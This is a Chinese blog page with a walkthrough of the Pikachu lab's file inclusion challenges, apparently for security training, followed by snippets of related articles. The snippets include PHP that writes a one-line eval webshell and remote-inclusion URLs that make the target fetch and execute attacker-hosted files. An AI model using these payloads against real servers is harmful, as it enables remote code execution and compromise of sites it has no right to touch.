pikachu-File Inclusion

最新推荐文章于 2025-04-24 19:36:54 发布
原创 最新推荐文章于 2025-04-24 19:36:54 发布 · 1.2k 阅读 · 19 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#安全

文章讲述了作者通过实验发现并利用PHP的FileInclusion漏洞,从本地文件包含到远程文件包含的过程,包括漏洞触发、文件上传、getshell获取以及远程代码执行。最后总结了对文件上传漏洞的理解和相关工具应用。

实验步骤


File Inclusion模块

php的文件包含不管文件后缀名是什么,只要包含php代码,就可以被当作php代码解析第一关  File Inclusion(local)


首先可以在输入框中选择很多NBA明星,可以看到他们的照片和简介,同时访问是URL也暴露了出来,然后一次访问,依次可以看到有filex.php(x是数字)这样的的文件,而且是通过URL参数从前端传到后端的话,如果没有严格过滤就很可能有文件包含漏洞


那我们bp查看一下数据

将数据发送到测试器,我们看看之后数的字是否还有别的有用的信息

爆破的就选择数值就可以了,从6到100


6到100,每次依次增加1

最低0.47元/天 解锁文章
Pikachu靶场——文件包含漏洞(File Inclusion)
来日可期的博客
10-05 9719
大多数情况下,文件包含函数中包含的代码文件是固定的,因此也不会出现安全问题。 但是有些时候文件包含的代码文件被写成了一个变量,且这个变量可以由前端用户传进来,这种情况下,如果没有做足够的安全考虑,则可能会引发文件包含漏洞。
pikachu之文件包含
qq_42728977的博客
12-24 3673
参考链接https://www.cnblogs.com/p201721210007/p/12034896.html 文件包含漏洞(File Inclusion)概述 文件包含,是一个功能。在各种开发语言中都提供了内置的文件包含函数,其可以使开发人员在一个代码文件中直接包含(引入)另外一个代码文件。 比如 在PHP中,提供了: include(),include_once() require(),r...
Pikachu-File Inclusion
baynk的博客
11-19 993
0x00 File Inclusion(文件包含漏洞)概述 文件包含,是一个功能。在各种开发语言中都提供了内置的文件包含函数,其可以使开发人员在一个代码文件中直接包含(引入)另外一个代码文件。 比如 在PHP中,提供了: include(),include_once() require(),require_once() 这些文件包含函数,这些函数在代码设计中被经常使用到。 大多数情况下,文件包含函...
pikachuFile Inclusion
Alsn86的博客
12-10 1859
pikachuFile Inclusion 准备好一段创建一句话木马的php代码,后缀改为jpg <?php $mima="'".'ma'."'"; touch ("testshell.php"); $file = fopen("testshell.php","w"); $write='<?php @eval($_POST['.$mima.']); ?>'; echo fwrite($file,$write); fclose($file); echo "已经创建一句话php文件";
pikachu--- file include
weixin_50339832的博客
06-16 367
文件包含,是一个功能。在各种开发语言中都提供了内置的文件包含函数,其可以使开发人员在一个代码文件中直接包含(引入)另外一个代码文件。 比如 在PHP中,提供了: include(),include_once() require(),require_once() 这些文件包含函数,这些函数在代码设计中被经常使用到。 大多数情况下,文件包含函数中包含的代码文件是固定的,因此也不会出现安全问题。 但是,有些时候,文件包含的代码文件被写成了一个变量,且这个变量可以由前端用户传进来,这种情况下,如果没有...
PiKachu-File Inclusion(文件包含漏洞)
m0_49025459的博客
04-22 1023
概述 File Inclusion(文件包含漏洞)概述 文件包含,是一个功能。在各种开发语言中都提供了内置的文件包含函数,其可以使开发人员在一个代码文件中直接包含(引入)另外一个代码文件。 比如 在PHP中,提供了: include(),include_once() require(),require_once() 这些文件包含函数,这些函数在代码设计中被经常使用到。 大多数情况下,文件包含函数中包含的代码文件是固定的,因此也不会出现安全问题。 但是,有些时候,文件包含的代码文件被写成了一个变量,且这个
Pikachu靶场-File Inclusion
sucker的博客
04-24 1067
文件包含漏洞(File Inclusion Vulnerability)是Web应用程序中的一种常见安全漏洞,通常由于开发者未对用户输入进行严格过滤,导致攻击者能够包含并执行恶意文件。,攻击者准备恶意文件,在攻击机(192.168.23.182)上创建包含恶意代码的文本文件(如。攻击者通过篡改参数,包含服务器本地的敏感文件(如配置文件、日志文件等)。1,观察网站,提供了一个选择框,运行用户根据名字选择提交查询。1,观察网站,提供了一个选择框,运行用户根据名字选择提交查询。
Pikachu-File Inclusion-远程文件包含
guanrongl的专栏
10-04 976
是指能够包含远程服务器上的文件并执行。由于远程服务器的文件是我们可控的,因此漏洞一旦存在,危害性会很大。但远程文件包含漏洞的利用条件较为苛刻;因此,在web应用系统的功能设计上尽量不要让前端用户直接传变量给包含函数,如果非要这么做,也一定要做严格的白名单策略进行过滤。再次请求远程文件包含, filename 的值改为http://192.168.3.218:8000:test.php。首先,在D盘下构造一个 test.php 文件 ,可以看到,phpinfo 已经显示;PHP的需要php.ini中配置。
pikachu靶场-File Inclusion
braty_的博客
02-24 850
File Inclusion(文件包含漏洞)概述文件包含,是一个功能。在各种开发语言中都提供了内置的文件包含函数,其可以使开发人员在一个代码文件中直接包含(引入)另外一个代码文件。比如 在PHP中,提供了:这些文件包含函数,这些函数在代码设计中被经常使用到。大多数情况下,文件包含函数中包含的代码文件是固定的,因此也不会出现安全问题。但是,有些时候,文件包含的代码文件被写成了一个变量,且这个变量可以由前端用户传进来,这种情况下,如果没有做足够的安全考虑,则可能会引发文件包含漏洞。
pikachu练习——file inclusion(文件包含漏洞)
haoaaao的博客
01-26 1445
一、file inclusion(local)???????? 1、在文件上传漏洞的getimagesize中上传拼接的111shell2.jpg文件 (1)这是文件url路径 http://192.168.1.32:8083/vul/unsafeupload/getimagesize.php (2)这是题中所给图片保存路径: uploads/2022/01/25/63414861efd573ba090720236716.jpg (3)将二者拼接 http://192.168.1.32:8
File Inclusion(文件包含漏洞)之 pikachu 靶场练习
Goodric的博客
01-25 1521
File Inclusion(文件包含漏洞) 文件包含漏洞分为本地文件包含漏洞和远程文件包含漏洞。 上一篇文章对文件包含进行了一些学习:文件包含漏洞学习 下面通过pikachu 靶场里的 File Inclusion 模块对文件包含的两种分类进行测试。 File Inclusion(local)本地文件包含 当包含的文件在服务器本地时,就形成了本地文件包含。 进入界面,按上面的说明选择一个名字后,可以看到 url 发生了变化,通过前端传了一个文件名到后台,而后台会对指定的目标文件进行操作。 (指定的文件都是
pikachu靶场 文件包含漏洞解析 file inclusion
weixin_44023442的博客
02-03 664
1、File Inclusion(local) 任意选择NBA player,页面显示如下: 其url直接暴露了查询信息,简单的直接修改: ?filename=../fileinclude&submit=提交查询 说明存在文件包含漏洞(当然实际情况也有可能是:该文件不在过滤范围之内。) 测试能否使用伪协议 ?filename=file:../fileinclude.php&submit=提交查询 测试能否使用http://,php://等协议 ?filename=https://www
File InclusionPikachu
m0_72827793的博客
12-26 356
提交的是一个目标文件的路径,我们可以改成一个远端的路径,读取远程文件。找到自己的文件(本地文件)shell.php的路径写上去。观察url,显示是一个文件file1.php。这时会自动生成一个yijuhua.php文件。再次访问此路径就可以执行我们想要的命令。可以直接通过url修改这个文件。原因:这个后台系统是没有的。用Pikachu提供的。这里随便点击一个提交。
Pikachu 靶场 File Inclusion 通关解析
Flag少侠的博客
05-12 1966
文件包含漏洞(File Inclusion Vulnerability)是一种常见的网络安全漏洞,它允许攻击者通过恶意构造的输入来包含并执行本不应该被执行的文件。这种漏洞通常存在于Web应用程序中,特别是在使用动态文件包含函数或语句时。文件包含漏洞可以分为两种类型:本地文件包含漏洞和远程文件包含漏洞。1. 本地文件包含漏洞:本地文件包含漏洞发生在应用程序将用户提供的输入作为文件路径进行处理时,攻击者可以通过构造恶意的文件路径来包含并执行本地文件。
PikachuFile Inclusion文件包含实战
「我唯一会的和擅长的只有网络安全,如果我不能在我最擅长的事情上取得成功,那么我根本不知道,我的人生还有什么意义。」
11-09 1393
永远也不要忘记能够笑的坚强,就算受伤,我也从不彷徨。
pikachu之文件包含漏洞
weixin_51446936的博客
06-09 2522
一、文件包含漏洞概述 在web后台开发中,程序员往往为了提高效率以及让代码看起来更简洁,会使用“包含”函数功能。比如把一系列功能函数都写进function.php中,之后当某个文件需要调用的时候就直接在文件头中写上一句<?php include function.php?>就可以调用函数代码 但有些时候,因为网站功能需求,会让前端用户选择需要包含的文件(或者在前端的功能中使用了“包含”功能),又由于开发人员没有对要包含的这个文件进行安全考虑,就导致攻击者可以通过修改包含文件的位置来让后台执行任意
Pikachu靶场File Inclusion文件包含漏洞~保姆级教程!!!
2301_77360738的博客
05-17 1194
Pikachu文件包含漏洞,详细讲解本地文件包含和远程文件包含,保证一看就会,一学就懂,小白可入!!!
pikachufile inclusion
最新发布
10-29
### Pikachu中文件包含的使用 在pikachu中,文件包含相关操作通常通过构造特定的URL参数来实现。例如,在示例引用中给出了一个远程文件包含的URL:`http://127.0.0.1/pikachu-master/vul/fileinclude/fi_remote.php?filename=http://127.0.0.1/pikachu-master/shell.txt&submit=提交查询` ,这里通过 `filename` 参数指定要包含的文件,服务器会尝试包含该文件内容。当访问这个文件之后,就会执行该代码,在本地创建一个文件,包含一句话木马,如 `http://127.0.0.1:8080/pikachu/vul/fileinclude/fi_remote.php?filename=http://192.168.3.184:8080/aaa.txt&submit=提交` [^1][^3]。 ### 漏洞利用 文件包含漏洞分为本地文件包含(LFI)和远程文件包含(RFI)。本地文件包含仅能够对服务器本地的文件进行包含,由于服务器上的文件并不是攻击者所能够控制的,因此该情况下,攻击者更多的会包含一些固定的系统配置文件,从而读取系统敏感信息。很多时候本地文件包含漏洞会结合一些特殊的文件上传漏洞,从而形成更大的威力。例如攻击者可以上传一个包含恶意代码的文件,然后利用本地文件包含漏洞包含该文件,从而执行恶意代码。远程文件包含则允许攻击者指定一个远程服务器上的文件进行包含,攻击者可以构造包含恶意代码的远程文件,让目标服务器包含并执行,如通过构造恶意的 `aaa.txt` 文件,让目标服务器执行其中的恶意代码 [^2]。 ### 解决方案 - **输入验证**:对用户输入的文件名进行严格的验证和过滤,只允许包含合法的、预定义的文件。可以使用白名单机制,只允许包含在白名单中的文件。 - **禁用危险函数**:如果不需要使用远程文件包含功能,应在服务器配置中禁用相关的函数,如 `allow_url_fopen` 和 `allow_url_include` 等。 - **限制文件路径**:确保包含的文件路径在可控的范围内,避免攻击者通过构造特殊路径来包含敏感文件。 ```php <?php // 示例:白名单验证 $whitelist = array('file1.php', 'file2.php'); $filename = $_GET['filename']; if(in_array($filename, $whitelist)) { include($filename); } else { echo "Invalid file"; } ?> ```
评论 1
成就一亿技术人!
拼手气红包6.0元
还能输入1000个字符
 
红包 添加红包
表情包 插入表情
表情包 代码片
 条评论被折叠 查看
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值